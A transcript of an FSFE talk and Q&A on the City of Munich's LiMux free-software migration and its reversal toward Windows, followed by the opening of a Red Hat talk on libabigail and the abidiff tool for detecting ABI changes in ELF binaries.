of Munich, said that it's a Linux fault and if at least our systems would be better, so he was also claiming that this is the Linux, it's the fault of Linux, also it later turned out that Linux had nothing to do with this problem. So yeah, regularly in the press you could read that people were unhappy and that they now want to switch back, they were never shy to say, yeah, we are switching back to Microsoft Windows now and when you were traveling at that time, people all around the world, what they heard was, oh, Munich switched back to Microsoft Windows, right? So even now when you meet people, they still think, well, they already switched like two years ago, didn't they? And yeah, so that was already from the overall picture of what people around the world think what Munich is doing, they have already migrated to Microsoft Windows years ago. What happened next was that the government, they paid for a study to evaluate their IT and people already at the beginning when the study was started already said, oh, it will be quite clear what the outcome will be because the study was given to Ascension, which is it's Microsoft Gold partner of the year for I think eight years in a row. So they thought, okay, it will be quite unlikely that they will say anything positive about free software. But it didn't turn out like that, the outcome of the study was mainly that they highlighted organizational problems. So they said, yes, there are also technical challenges, but the biggest problem are the organizational difficulties you're facing. For example, at that time, one of the city council members, they said that they have, because no central entity can decide when to apply an update, every entity can do that and alone, every department can decide how to do that. They had phases where they have more than 10 to 15 different operating systems and versions there running. And they were open office versions from several years ago with bugs where people were complaining about which were already fixed for years. So yeah, they said their main recommendation was you have to fix those organizational problems and fix your structure. And then it was a little bit silent for some time again. And then there was a surprise motion in the city council that was earlier this year. Before there was something on the agenda about those organizational changes, they didn't take the recommendations directly which essential was giving them, they found another organizational structure which they wanted to do, but that was mainly on the agenda. And then a few days before the city council meeting, there was a slight update. It was under 6B new. And then they added a few words to say that they want to prepare a concept to move to unified Microsoft Windows client. And everybody was like, what? There are supporting documents for that, what costs will be associated with that change? What plan do you have? But there was nothing. It was just those words there. So we thought that if they want to take this decision, they should at least take this decision with knowing the facts. They should be aware of what they are deciding about. So we gathered lots of questions like how much will that cost? What dependencies do you have at the moment which might not run on Microsoft Windows client? What will happen with your IT staff which is now trained to run the free software operating system and all the software you are running at the moment? What will they do? Can just be Windows, Microsoft Windows admins or what will happen there? And together with other organizations, we gather lots of questions. And then we contacted all city council members and asked them to, before they take this decision, that they should answer those questions for themselves or ask the government what the answers to those questions are. And we also raised those questions with the press and to our supporters and asked them to ask their politicians about that. That resulted in a lot of questions to the politicians there. So at the meeting, at the final meeting, everybody of the city council, several people from the city council were saying they never had so many requests by the public. They never had so many people interested in what they are doing there. They got so many questions there and also from the press, it was not just the IT press which was there, they were also people there from with a TV team like Investigate Europe. It's a team of investigative journalists. They at that time also worked on a story on the dependency of public administrations in Europe on Microsoft. When they heard about that, they went there with a camera team and recorded everything and made interviews. So there was a lot of attention about that. And due to that attention, I believe that the mayor had to move back a little bit. So he said this was never supposed to be a decision to do that. It was just about examining it. And so that's all recorded and on the video. And he said, well, it's just about examining. It's not a final plan yet to do that. And during the City Council meeting, the feedback from the opposition, there were people, there were very outraged that this was just put on the agenda a little bit before in a sub note just adding a few words there. So in the end, they agreed to amend this decision. So they added that this new concept should also include like what software will afterwards not be used anymore, that this is clear, which will not run afterwards. So everybody in the city knows, in this city administration knows what software they will not be able to use. They would have to provide a rough estimation of the costs at least, which is quite good because before that you heard lots of different numbers, which were sometimes like 20 million, 40 million, 80 million or so. And I think it would be beneficial if they know a little bit clearer on how much money they would like to spend there. And it was added that the final decision about this move will be taken in the City Council again. So that is not a decision, but it will be decided later in the City Council. So that was the meeting earlier this year. But in the meeting, you could already hear that a lot of them, they were already convinced that they want to go back to Microsoft Windows, especially from the CSU and also some people from the SPD in their comments, they already said, I am very happy that we are now moving back to Microsoft Windows and then they continue to argue. And even now after those amendments, it's not clear to the people in the City Council what exactly this is now about. Some people think they decided to move back to Microsoft Windows. Other things know it was just about a concept. So it's quite some chaos there. But their plan is now to develop a concept so that they can switch all their workstations back to Microsoft Windows, to one Microsoft Windows client, till 2020. And beside that, also do those organizational changes they decided on. That should also happen till that time. So that's the plan at the moment. And we also hear again that they are now already internally preparing some things like changing budgets and already shutting down some services to already move in this direction. Also there was no official decision yet and the City Council did not take any decision. But still, I think it's fair to say that this is the end of a lighthouse. So it's not anymore the shining example of free software in the public administration if it was that before. So even so, there are people there who do good work and who try hard to migrate to free software there and keep that running. If their boss constantly discourages and sabotages their work instead of supporting them, something like that, you cannot do that. So the question is, is it all their fault? Is it their fault that there was no political support, that they made a lot of mistakes on how to handle that? And is it mainly on Munich? I think that this would be a bit too easy. And I think that if we have this approach, we will lose the advantage to use this as a moment to evaluate if maybe we also did some mistakes. Like all of us here, if some of us also made things which made it more likely for this migration not to work out or also for other migrations that they don't work out. So I would like to raise a few questions and I'm very much looking forward to your answers to that afterwards in the discussion. And yeah, so first question, do we suck at desktop? So I mean free software, it's very dominant in a lot of places. We have supercomputers running free software, all kind of servers. We have a lot of embedded devices. Cars are now running free software. We have them in so many places, mobile phones. You have everywhere you have free software operating systems. But in the desktop area, even a lot of people in our community are using proprietary operating systems there. So why? I think that's something which we should think about and if we can come up with solutions on fixing that. It's also, yeah, there could be the question, is it not about a desktop? I mean, would our desktops be fine? But is it a problem that there is a huge dependency in the public administration on Microsoft Office and Microsoft Exchange? So it doesn't matter how good your desktop below that is, even if it's better, those systems don't run there. So you're not able to be able to switch anyone. It could also be, but then still, why are so many people in our own community running our operating system? The other question is, did we concentrate too much in our communication to friends and people around us about the cost saving? So do we concentrate too much to highlight that free software, it's cheaper in the long run and that it's mainly about costs? And there the question is, like, if we constantly do that, also with our friends and people around us, people will often associate free software with it's the cheaper solution. So if I don't have a big enough budget, I still have the possibility to move to free software. With this approach, people will not allocate enough budget to move and migrate to free software. Migration will also always cost a lot and why should free software be cheaper than proprietary software in the short term? I mean, in the long run, maybe yes, but still, this connection with it's cheaper, it's maybe greater, is that something which we can fix by already educating people around us that you have to pay for free software too. When we provide something to them, we can also ask them to pay for that. And the question is, if sometimes we might not encourage people in our community or companies that they are charging for free software. Sometimes some people of us, they are attacking people because they put a price tag on free software. Can we move a change the perception there in another direction if we are more regularly charging for it and supporting people who are charging for free software, if it's individuals or companies? And that's maybe one of the most provocative. Do we sometimes harm ourselves by volunteering? And that's from the situation that sometimes with those migrations, you either have staffers or external volunteers who want it so much that public administrations or schools or other organizations are switching to free software that they say, well, I will invest a lot of my free time into that or a lot of energy into that. So they start doing that, also there is no budget allocated to it. And their boss says, yeah, okay, I mean, you now convince me or you told me about those advantages now for several years. Go ahead. And then you invest a lot of time and energy into that. And after a few years, I mean, you might be able to cope with a lot of those challenges, but after some time, you might face a lot of problems. And if you don't have a budget then to get help from external people, you will most likely fail. So what happens usually is that then the bosses, they don't think like, oh, so the problem was that we didn't allocate budget so that we could get external professional help for our migrations, but the result is mostly, oh, so free software doesn't work. Let's allocate some budget and do it with a proprietary company the right way. So the question is, do we sometimes by investing too much of our time and energy into switching people to free software without the appropriate budget harm free software in the long run? And is it not sustainable enough if we do it that way? Might we even have to tell people when they want like to move to free software when they don't have a budget, tell them, well, don't do it. Stay. Concentrate your smaller budgets on something else. So yeah. Then another question is, did we focus too much on the operating system and too less on applications? And that's two questions actually. On one side, I think it's also understandable. A lot of people from us, we use our operating system and we are very happy with those operating systems and we would like others to also benefit from them. So we are not that much interested in all the other applications which public administrations are running. They are very complicated and often boring, but by focusing on the operating system, is that the right thing for the public administrations and then to switch the operating system? Or wouldn't they benefit more if we are concentrating more on making sure that all the applications in the first run will be free software there? On the other side, there was also maybe another part that some people internally of public administrations focus too much on the operating system. So maybe instead of focusing on the applications more, they first started to build their own distributions for the migration. Might that be a mistake? Might it be better to use standard free software distributions and focus more on the applications where more people in the organization might see differences? And the other question is, is it possible that we concentrated too much on a few stars? And is that a problem in the long run when you are putting too much of your arguments in one place? So my observation for a long time was when people asked, does free software work in public administration on general? People said, yes, Munich. And that was the default answer of many people. The problem is that, as we saw, in one city it's not just a technical component which is responsible for the success or the failure of something. But if we always just mention a few examples and put projects in those star positions, that might be very harmful for us in the long run. And on the other hand, do we actually still need it? We are now in a situation where so many companies are using free software out there. And also public administrations, when you go away from the desktop part, in so many places they are using free software, free software applications to solve their jobs. So wouldn't it be better to concentrate on showing those examples, what you can do with free software in the public administration and not so much focus on desktop or on a few examples where they achieved that? So yeah, now I ask a lot of questions and I'm very much looking forward to discuss them later with you. And I also want to give you a short out view of what we at the FSFE want to do in the next months and years probably because that will not be a short-term project. So we are at the moment in the process to start a campaign. It's called Public Money Public Code. Our belief is that public administrations, whenever software is produced with public money, it should be published under free software license, that should be the baseline. And we are at the moment starting with that, gathering a lot of information. So we believe that the default in public administration should be that they reuse software again when they develop something, that they share new applications and all of that independent of the operating system. So it's not just about software which is running on Krono Linux. It's about software which is running on Windows, which is running on Mac OS, on Chrome OS, or whatever they are using. We would like that to be free software. We would like them to be able to share software with each other. It's not about cost savings. We believe that the IT will be better. They will be in control of their IT when using free software. And we think that by that they will also give a better service to their citizens. So yeah, this one is a picture this year at the I Love Free Software Day in February, where some volunteers, they use projectors to project this message already at government buildings, because we think that in this time we also need good pictures with the press. So that picture was already also used by Investigator Europe in their reporting about Microsoft dependency. The other thing what we are doing there is that we are gathering quotes from people who are supporting that, in that case the European Commission, but we would like to have better support from people, from companies, from politicians, celebrities, so whoever also would think it is more about sharing and reusing government software instead of procuring something again and again. We are looking for good examples about that, so not like desktop users but more applications. For example, I mean many people heard about Munich in free software but who of you know is Fix My Street? So Fix My Street was developed in the UK. It's a software where you can report problems when the road is damaged and you can help your public administration to fix this. This is meanwhile used in eight countries around the world. They are using the same software. It's free software. You can have apps to report that. Those are examples which we would like to highlight, how public administration can benefit from sharing this. With this example, the Berlin city just a few months ago, they developed their own software doing exactly the same thing. It costs 1 million Euro. And if you are interested to help with that, we would be very happy if you join us. One of the most important things we are doing there at the moment is that we are gathering a lot of data. How is software procured at the moment? What kind of software do they procure? How often do public administrations procure the same software again? For that we are starting a lot of freedom of information requests to public administrations. And at the URL down there, there are examples for different countries, for different cities. So you can use that and submit that to your city. On a lot of countries, there are also platforms which make it very easy to do those requests. We document that when we knew about it, when you know about more, add that to the wiki. It will not be that much time for you to make those submissions. But in total, when all of us do that, we will have a very good database for the future campaign. So before I go with you to the Q&A, I would like to end with one quote from my first teacher actually. Many small, no, he wrote that down for me, so he didn't invent that, just to clarify that. So many small people in many small places do many small things which will change the face of the world. So every action counts. So whatever you do, if you are developing, packaging, distributing free software, if you are documenting it or translating it, or if you are helping new users or developers to get active in free software, all of that, it might not seem big at the time you do it. But all the different activities by all the different people together in so many places, that will change the world. So thank you for helping us to change the world, and I'm looking forward to the Q&A. Thank you. Thank you. Thanks a lot. I think that was a great presentation, and I think we shouldn't see it all too negative. I mean, if they really move back to Windows and the whole administration gets fucked up by a crypto-troy and it's much easier to ask the friends from NSA to get it back up. So I think it's not that bad. But aside of the jokes, two things I would like to address. First thing is, was there ever an evaluation whether the new operating system by Microsoft is Windows 10 is according to the German Betriebs Verfassungsgesetz, it's called, because only the part of the information that they are transferring to a service abroad may already violate this law. The second thing, you're asking whether we are focusing too much on operating systems instead of applications. I think applications is not that what a company wants, they want solutions. I mean, in the end of the day, you don't want to buy a drill machine, you want a hole in the wall. So I think we as a community should more focus on solutions that we could provide, not even on applications or operating systems. That's the idea. Thanks. So yeah, thank you very much. So for the first question, I'm not aware that they did an evaluation about that. From what I saw, there was no reason, real evaluation about this move at all. So it felt a little bit like we want to switch to Microsoft Windows because we want to switch to Microsoft Windows. It doesn't make sense in a lot of, from a lot of aspects because they also have this goal that in five years, they would like to be independent of the operating system. So why now focus on migrating the operating systems when in five years, they would like to be independent of the operating systems? That doesn't make a lot of sense. But in general, I haven't seen any evaluation there. It was not the evaluation of the city council of Munich, but it could be more an idea for the Free Software Foundation. I guess you have some lawyers as well who may be able to check that. Okay. I'll note that down. But yeah, till now I'm not aware of that. And for the second edition, yes, you're right. It's even better focus on solution than on applications that might even be better than calling it applications. So thank you. Just to reiterate what the other comment before, in 2018, like next year, we will have a new data protection law throughout Europe, which is even stricter and enforcing that will become even harder with Windows 10 or whatever. So that's definitely one thing that the Free Software Foundation and other Free Software initiatives should focus on when we are trying to gather selling points for open source. And yeah, that requires some legal advice. I'm pretty sure you do have some competent lawyers, but we need to stress that message more often, I think. Yeah, that might be a good thing. Such analysis often costs a lot of money. So everybody who is interested in that, if you support it or if you know other organizations which are also interested in that in joining this, then I'm very happy to do that. I think also that there will be probably some issues there as from everything which you see from the city of Munich. It's already very much tailored to go to Office 365 and a lot of things which will not run locally at the beginning. I also appreciate the call that you give to us to reflect on what role that we will continue to play with these sorts of adoptions that come forth. You mentioned that this would likely be the end of Munich being considered a lighthouse. Are there other public service entities, particularly large-scale ones like the city of Munich, that we can now look to be that lighthouse at this point? Or are there others that are investigating from a public sector using open source at that kind of scale that we can now call the lighthouse? So first, I don't know if that got clear. I'm somehow reluctant about those big stars at all. So it's always, yes, sometimes different organizations are doing good things, but sometimes those organizations then also change. For example, there was a very nice policy from the White House last year that when they develop new free software, 20% of that should afterwards be published under free software license, a very nice policy. So that was a nice example at that time. Now it's getting more difficult with using that as a good example. It's also for some organizations or countries they have quite good policies, like Russia introduced some free software policies. China is also using a lot of free software. The question is, do you want to have them as the shining examples of free software use? I think we should, I mean, there are also other desktop users, the Chandamerie in France, also from the research from Investigate Europe. We also learned that they are under permanent pressure from other organizations which try to get them to switch back again. So in general, for a public administration which is switching to free software, it's very difficult to be on a public spot. It's also very difficult with proprietary software for public administration to be in the spotlight. So I don't think we should put that many organizations which are moving to free software in this position that they don't have time to do a migration or to deal with their IT, but that they have to answer lots of public requests, deal with a lot of questions from all kind of parties and so on. So that's another issue which is problematic there. But I think we should focus more on lots of smaller examples where people, organizations did some nice things. Like the example with Fix My Street, that's a nice thing where one government started with it and then several others are using it. And if you look, for example, at the website JoinUp from the European Commission, there are regular examples of what public administrations are doing with free software. Some of them are better, some of them are not so good maybe from a free software perspective, but there are a lot of examples out there. And I would argue more for pick some examples which you like there and we don't even have to coordinate which examples we pick because pick those you like most and then it's more distributed and we have way more examples about free software. It's not looking like Linux is just used by Munich, but people learn about different examples from different people. So I don't want to tell you one or two examples which you then will use. Search your own. There are enough out there. Yeah. So two comments. First of all, on the data protection laws, I wouldn't be too enthusiastic because those guys at Microsoft aren't dumb. They have already established a fully German 365 with telecom. So for example, if anyone just has the problem with data going to the US, they can claim, no, we have one that is work that's managed by Deutsche Telecom. It's fully approved by the governments and so on. So yeah, there will be some way of making this a topic, but they have already thought about many of those things and other workloads are going into the cloud. So I'm sure that legislation will also take this into account. To some extent, on the other hand, the cloud is a good thing for us because the desktop applications are no real reason anymore. I'm seeing more people do presentations live off Google Docs than they are using PowerPoint these days. So that's an argument where I think Munich is kind of late in the game. They are trying to switch back in a time where everyone else has realized, well, I may only need my iPad, my Android device, my Linux device with a browser, and I can have access to all those things, which basically also is my second big point. There is a very popular Linux-based desktop OS, Chrome OS, that is market leader in the US educational market. So of course, we wouldn't call it a free Linux OS. It has quite some strings attached, but it shows that if someone focuses on the whole ecosystem, how can I get my applications to run? How can I make user management easy? Locking down systems for students or employees, then those things can fly. I think it's just a matter of fragmentation between all the vendors, and it's very hard to do an open source implementation of a strictly enforced framework. Thank you. Thanks. I have a few notes. I'm kind of involved in this open source initiative in the Czech Republic. And what I can see is that always is about the money, as you mentioned, that if there is anything about we can switch to open source, what we can say. But I think that even you mentioned it in the end of your presentation, that it should be more like anything which is funded by the government or public money that should be open source or we should own the code or it should be public domain. And I think this is what can be highlighted. And it's like one of the reasons why to do that. It doesn't matter if it's on Linux or anything else. And the other notes are even if Munich fell as a lighthouse, we can take it as an opportunity to think about the new starts and learn from that. Actually, this is what we are trying to do in the Czech Republic, that we can learn from not mistakes, but what didn't go well. And the last note is that I think that mostly what is discussed, if it's anything about open source in public sector, is that we are talking about consequences, but not the cause. For example, before we switch, there should be some kind of talk or discussion about what we want to switch or do we have enough inputs from the sections of the departments, what kind of information they want to share or what they need to share, what they need to work with. So for me, it's basically that we are like the government or offices are switching to open source, but they don't evaluate inputs for that, which can lead afterwards to a failure because this is not working, because nobody know before that this should be in this way. So I think that if this change, that there should be a preparation and that before that migration starts, that there will be clear data what is needed or what the departments need, then it can help even with the migration and even with public opinion. Okay. Thank you for the comment. I just, I realized one thing, maybe I was a bit too negative about that because you mentioned that Lemux failed. I think, I mean, I don't think that it was a failure just to glorify that and even, I mean, with the cost, with the savings and so on, there was at least one huge benefit, not so much from Munich, but for all the rest of the public administrations around the world or at least in Europe by them showing that there is another way of doing it, all the other public administrations benefited because in my opinion, Microsoft had to calculate that in their prices, that there is another option. And also from those research from Investigator Europe, we learned that public administrations got a huge cut in their prices with Microsoft when they mentioned that they might switch to GNU Linux. So even if all the rest of it was not successful, it was not a failure just to glorify that point. So yeah. Hi, Matthias. So first, thanks for your great talk and also your great work. I appreciate it a lot. And I want to address the infamous desktop and usability issue. So I talked to a few people that were more or less involved in the lemux issue and some quite terrible stories reached me of secretaries that just basically couldn't work anymore. They were running out of the offices crying because they couldn't do their task. And one issue in Munich was that the city failed to educate their staff. So when you have users and you make a big change, and even if you just change the desktop from Windows to Linux, and even if you try to look or make it visually the same, it's a different usability and you need to teach the people. So this is something the city failed at entirely. And this is an important point also for the desktop or the free software in general. It's about the users. I see that the community is sometimes very self-centered. So it works for me. It doesn't mean that it works for other people. And a nice example I take is email clients. There is no email client that doesn't suck a lot. All emails clients suck. And there is no way that a cat, for instance, get my mother to use mud because it's not a way how she would like to interact with the computer. So I see a lot of space for improvement regarding the usability. And if we want more people to use the desktop or also the applications, we need to make and develop them and make them look like in a way they want to interact with the computer. And this is why I also guess Chrome OS is so successful, especially in the yes, because it just works like people want the computer to work like. And although yes, there is Linux or some Gen2 below or underneath, it's not free software at all. But in the end, this is something I would recommend my mother to use because it just sucks less than others. That's basically my point. Okay. Yeah. Thank you. So I totally agree that there are a lot of ways on how we can improve the usability of free software. I think it's also partly connected with the question I raised if maybe we should also encourage more people to pay for free software because you can use that to get other people involved who focus on usability instead of implementing mainly functions. I'm not so sure if the Linux project, if they completely sucked at doing, like in including the users there. I mean, in comparison with other public administrations, my impression was that they were even better including them than in some other administrations when they switched from one Microsoft version to the other and also those things all changed from one Office version to the other. So I'm not sure on how much we should blame them there, but it's a huge effort to help users to migrate from one software to the other. And it's often underrated how much resources you need for that. And beside that, I'm very happy to afterwards discuss the usability of email clients and would argue that there are some good email clients which also suck less, but yeah, that's for later I think. Okay. Last question. Anyone have? Okay. Okay. Thank you very much for a great talk. And I think I want to address about the problem why it's why it happens. Can you move your mic a little bit up? Okay. Sorry. Yeah, for me, the problem is about educational socialization because most of the user, for instance, like in my case, when the first time I changed from Windows to Linux, the first things that are in my mind is, well, it's Linux. It's pretty difficult. And how can I install my software? How can I sell the things? How can I sell everything? But since the software that I'm working on only works in Linux, then, well, I should to learn. Then after I learned, the more I learned and I think, oh, well, it's not really bad. And it's not really bad. And I even can, you know, sometimes, for instance, like in labor office drawing, you can, I can manipulate some picture to some publication instead of spend the time in CoralDraw in Windows. So yeah, I think maybe because most of the users not from the IT, they are, okay, you should use in Linux and they're, okay, well, it's like a black screen in the desktop and they will be things twice before when they are growing with the Windows and they should be things twice to change in another open source, something like that. Okay. Thank you. Thank you. Okay. So yeah, thank you very much for having me here again. Thank you for all your work for free software and yeah, looking forward to discussing with you in the future.
Started in 200X the Limux was often cited as the lighthouse project for Free Software in the public administration. Since then we have regularly heard rumours about it. Have they now switched back to proprietary software again or not? Didn't they already migrate back last year? Is it a trend that public administrations aren't using Free Software anymore? Have we failed and is it time to get depressed and stop what we are doing? Do we need new strategies? Those are questions people in our community are confronted with. We will shed some light on those questions, raise some more, and figure out what we -- as the Free Software community -- can learn from it.
10.5446/54472 (DOI)
So, hello everybody. Thank you for attending this talk. I know it's right after lunch, so you might be... Well, thank you for being here. So yeah, my name is Dujie. I work for Red Hat in the tools team. And my background is, well, a little bit in compilers and debuggers. And since a little while, I've been working on static analysis of ELF binaries to infer interesting things about ABI and stuff. So as a result, we came up with a framework named ABGAL, which is an acronym for ABI generic analysis and instrumentation library. Well, it's also the name of the wife of my... Well, the guy we started the project with. So, anyway. So we use ABGAL to basically compare binaries and come up with reports about the differences they have as far as ABI is concerned. So this can be really interesting to folks ranging from developers up to people pushing bits coming out of the developer's hand, namely these two people. And I thought it would be interesting to come and talk to you guys about what we've been doing in this area. And maybe we can find areas where we can work together and improve what we have or change directions, well, and discuss. So in today's talk, I'm going to first try and define what we mean by ABI. This is a quite fluid concept. It's not well-defined. And so it means different things for everyone. So I thought it would be an interesting take to try to define what we actually mean by that in this project. And then we'll talk about what we mean by ABI compatibility once we have a definition for the ABI. And then I'll jump straight to some examples of change reports we can have with the framework we have today. Once we have that, we'll dive into what ABGAL is, what it does, how we perform those static analysis tasks, and see how it is used in real life today. And then we'll talk about possible improvement. And well, I say we'll talk because I'll present something. But if you have ideas, please feel free to come up with those. And so here we are. So to define what an ABI is, well, let's set a context first. OK, suppose we have a binary, which we'll name E. And that binary uses a code from another binary that we call L. So basically, E can be an executable, well, that's where the E comes from, or a shared library. If there is something that is not clear, please just stop me right ahead rather than waiting for the end. So that's what E is. And L can be, well, a shared library. It's a library. That's where the L comes from. And it can also be a dynamically loaded module. So this is the basic context. So at execution time, what happens is that E expects properties from L. In this context, I wanted to say that we're talking mostly about L, the L Linux format right now. This is what we support. We could support other things in the future. But right now, we're talking about L. So E expects properties from L. At execution time. So those properties can be things like the format of the binary, the architecture, well, an executable, an x86 executable will expect an x86 library, for instance, right? x86 dwarf, well, elf will expect an x86 elf library, for instance. It will also expect the presence of certain elf symbols. Those coming from either functions or global variables or other things. Specific layout of data. When I talk about this, I mean types. Specific types of data and specific size, alignment, offset, et cetera, et cetera. There are also other stuff like calling convention, et cetera, et cetera. But the first three are the things we're going to focus on more here. So I wanted to stress also that those properties are structural. They talk about the structure of the program, not its behavior. We're not talking about bugs where we were supposed to add two numbers and we are now dividing them, things like that. We're not talking about dynamic things. We're talking about structure. You know, types, layout, things like that. So those properties that are loosely defined somehow are what we call the ABI. Those properties that E expect from L. Those are the ABI of L. So more specifically, when we talk about the ABI of a library or a binary in general, we'll be talking about the set of symbols that it defines and exports. And also the layout of the data expected by those symbols. So from now on, I will stop talking about symbols. I'll talk about functions and variables because, well, that is what programmers care about, even though a function in source code end up being, okay, usually a symbol in L. But we want to talk about things that are meaningful to developers. So I'm going to talk about now functions and variables now. So one thing to keep in mind is that ABI changes are there to stay. They're inevitable in our free software world. I mean, we want our software to evolve. You know, we've been talking about this all these three, during all these three days. So we don't want to cast things in stone and say, oh, no, you can't change anything anymore because you're going to break ABI, whatever that means. Things are going to change and the ABI is going to evolve because we are fixing bugs, we're adding features, we want to kick us, basically. So we're going to add new functions, we're going to add new global variables, how we are going to change the signatures, types, and whatever of the existing functions, all those things are going to happen. And we want these things to keep happening. And then what we want is to be able to detect the subset of those changes that are harmful. So can you read this? Yeah. So in this context to us, only what we call ABI incompatible changes are harmful. For instance, if you remove a function that was there and that was there in L in the library and that was expected by the executable, that is a harmful ABI change. It's an ABI incompatible change because existing Banner is executable Banner is that are in nature. Well, we'll expect that function that you removed from your newer version of the library. The same thing goes for incompatible data layout changes. Basically you have a type in which you removed a structure in which you removed a data member, things like that. Or you removed or added a function parameter, things like that. So you see I'm not talking about symbols anymore at this point, even though we're looking at Banner is. And it follows that ABI compatible changes are fine. They're fine, but we might need to see those, to still see them and review them and be sure that this change, even though it's not bad, is really a kind of change I expected, just from looking at the binary. So one thing to keep in mind is that we want to be able to detect all those things by looking at the binaries only, not by looking at the source code. This is really important to keep in mind because there are many reasons why we want this, but I think most of the distro people get this. When you have, well, compilation is a kind of destructive process. There's some information that are not there anymore. But there are also some information that are there that you can't see when you look at the source code. For instance, when you look at, well, we'll see that later in some of these examples that I have, but when you look at a data structure, a class or a struct, for instance, you don't know what the offsets of the data members are just by looking at the source code. You have to think, right? But when you look at the binary, boom, you have those information. So looking at the binary is really interesting because it reveals things that are hard to see when you just look at the source code. And we want to be able to detect those things as soon as possible. It's not when you are building the final stage of the distro that you want to detect those things as soon as possible in the dev process is what we want. And we need to keep in mind that there is no magic here. Most of the interesting changes need a human review to know if they are harmful or not. So you need to make those changes stick out from the noise and then have some folks to review them just like you review patches. So for that, what we want to use is to use the diff paradigm we have already. To let people review those ABI changes just as we review patches today, which is something we don't do yet, right? But well, this is the philosophy we're following while developing those tools and framework and so on and so forth. So yeah, I danced ahead the music here. So let's look at some examples. Okay, so this is the place where the time where I switched it. So in this case, I just wanted to show you something very quick. I have a friend here, Frédéric, who told me once, it was probably 15 years ago or something, showing code about what you're demonstrating is a really bad thing to do, right? But here, I'm not showing the code of Libabigel. I'm showing the code, well, Libabigel works on code, so it's different what I'm doing. So here, I wanted to show you, I hit this. So here you have a small function, F1, that has one parameter. And here you have in a new version, F1, another version, in which I added a parameter, right? And I probably, yeah, that's the only thing I did, I guess. So I wanted to show you what a Libabigel-based tool sees. So I've compiled these things. Well, I can run the compiler again, just to show that I'm not... I'm not... Ah, yeah. This is an artist setup, and it's like I'm on a piano or something. Yeah, okay. So I compiled this, and I'm just calling a tool named ABIDIF, and I give ABIDIF the first version of the binary, LibExample1. Yeah, I wrote this this morning while having a chat with a fellow here, so I couldn't find a better name. I was more involved in our discussion. So LibExample1.so.zero compared to LibExample1.so.one. Oh, boom, oh, sorry, I should put that in a red-rex that into a file named ABI. So have you seen what I did? So I called a program named ABIDIF, right? It's a program part of the Libabigel toolset that compares the ABI of two binaries, ABIDIF. And so here is the results of what it says. So can you read that? Yeah? Okay, it just says that... Here, so it says the function f1, like, you know, with its signature, has some changes in one of its subtypes, right? And the change is that the parameter 2 was added. That's all. And this is actually what we did if I do a diff of the source code. Sorry. V1. So you see here the sort... Do you see that? Can you read that? So this is the diff. And so this is... And so this is the source code. And this is an example of the kind of report you get, you know, from looking at the binary. So you see that even though you're just looking at the binary and its debug information, because I've compiled this with debug information enabled, you can have quite some detailed information, right? Like, like, light numbers, etc., etc. So we can move to something more involved with, you know, C++. So here we have... In blue here we have a class. Don't really need to read the details. We have a class here. And that class is used by another class, a structure. It is used here because we use C. You know, class name is C and we use C in another type underneath here. And you see, I still have a function named F1 that uses C. And I have a function named F2 that uses C as well here, right? And of course, on the second side of the screen there, the thing that is highlighted in blue is... Well, I created a base class. So I changed C and made C inherit a new class like this. You know, I was listening to the fellow over there. So this was my... It's because of him, you know, that inspiration came from you. So I just made this change. And well, I was like, okay. How about adding a virtual here, for instance, in the class? The idea is just to make some changes and see what ABI div says. And I kept F1 as is. I didn't change the signature. And I kept F2 as is too. Oh, well, there is also an F3. But anyway, let's go. Did I try it? Oh, yes. So I compiled it as previously. And I guess... Oh, yeah. I'm putting the result into a file. So I'm running ABI div on the two binaries, putting a result into a file, text file, and then I'm opening the text file in Emacs. So the changes are interesting here. So first, let's look at the summary of the changes that is shown by... Let's all say that there is one function that was changed. Change means that one of the types used by the function, or subtypes, you know, types of those types, changed. Right? And it also says that one function was added. Adding a function is not a problem. As I said earlier, it's an ABI change, but it's not necessarily a problem. But we still want to see it and review it and be sure that this change is really what we need. So we see that... And it says that the function that I added was C, the getM0. Did I add a function? I don't think so. I mean, I don't remember. So let's look at... So this was the first class I had. So you see getM0 was already there in the first version. And in the second one, what did I do? In the second one, I still have getM0. And you see I had a little change here in F1. In F1 here, I called... You know, I invoked the getM0. You see here? In blue. Whereas in the first case, there was no code. Okay. So this is C++. GetM0 here is inlined. You know what inline means? So it's not generated per se. Oh, sorry. Yeah. GetM0 is inline. So it's not generated, right? By default. But in the second case, it is generated. GCC generates it because it is called. Because someone uses it, then it is generated. You know? This is also because I compiled without optimization. If I compile with optimization, we can try that later because time is flowing. You'll see that this added function will disappear because of optimization. The thing, the function is just inline and not generated as a symbol, right? So these are the interesting things that you see when you just look at the binaries rather than looking at the source code. The same source code can produce different binaries depending on how you compiled it. How you change the code, et cetera, et cetera. This is what I meant by when I was saying we want to look at the binaries only. Well, being able to look at those. So added function. You see? And in here, you see the symbol of the function, right? And here, you see its signature, right? And so let's look at the changes, what it says. So, first, it says that the return type of F1 changed. Of course, that's true. I changed it from void to int. So we catch that. So you see that just by looking, okay, there are some tools around that would say, that we'll just look at the symbols, and because in C++, the symbols are mangled, you know, you could derive the types used by the function from the mangling. Do you follow me? Yeah, people say that. People think that. Well, they're wrong. Because, for instance, the return types of functions are not part of the mangling. Only the parameters are part of the mangling. And here, I made that change on purpose. You see that the return type of the function changed. And we want to catch that, too. So we really need to go look at the debug info and analyze all that, you know. So you see here that the next change it shows us is that the first parameter, which is a pointer to C, pointer to the class C, changed. Well, and how did it change? It changed because the thing that is pointed to by that pointer, which is C, changed. How did C changed? It had one base class insertion. You remember I said that I added a new base class. I made C inherit a new class. So we can catch that, too, by looking at the parameter. This is what we do. And as a result, well, as a result of all those changes, the size of C changes, too. This is something you cannot see by just looking at the source code, right? Well, you can see that it might change, but you're not sure. Actually, the reason why the size change here is because of the virtual. You remember I added a virtual keyword to the destructor. So because of that, virtual that I added, a V table got added to the class. And the V table is added at the beginning. And it's the V table. The V table is the reason why the size changed here, actually. So we see here that there is a V table insertion. And we can say at which line it was inserted and the V table offset, et cetera, et cetera. And as a result, because something got inserted at the beginning of the class, the offset of all the data members of the class changed, too. So we have these changes, too. Just by adding a virtual, right? So yeah, we can learn a lot by just looking at the binaries. So now I guess I'm done with showing off what we can do with this kind of tooling. So what do we do behind the scenes? Basically, Abigail and, well, what I call it, Libabigal, because it's the name of the project. Libabigal being the library that implements all the stuff and also a library of tools that come on top of that library. So basically, we represent ABI artifact. What does that mean? We have an in-memory models for types and declarations, just like a compiler does, just like LLVM does. So Abigail represents color types, integers, characters, and so on and so forth, aggregate types that are arrays, structures, classes, unions, blah, blah, blah. And declarations, a declaration being something that has a name and a type. So all those things are represented. You can write code saying, okay, this is a function. The function has parameters, and I'm adding a new parameter. You can manipulate those things. On top of that, Abigail has a model of what I call bundles of ABI artifacts. The 